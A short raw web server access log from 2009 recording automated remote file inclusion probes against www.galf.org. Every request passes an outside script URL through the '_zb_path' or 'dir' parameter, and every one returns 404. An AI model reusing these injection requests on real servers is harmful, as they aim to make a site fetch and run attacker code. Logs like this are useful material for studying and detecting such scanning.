122.155.5.84 - - [01/Nov/2009:23:00:02 -0800] "GET /logs/access_090824.log//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:23:00:52 -0800] "GET /logs/access.log//zboard//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:02:40 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:02:40 -0800] "GET /logs/access_090504.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:02:40 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:00 -0800] "GET /logs/access_090518.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:05 -0800] "GET /logs/access_090713.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:09 -0800] "GET /logs/access_090727.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:23:03:13 -0800] "GET /logs/access_090330.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
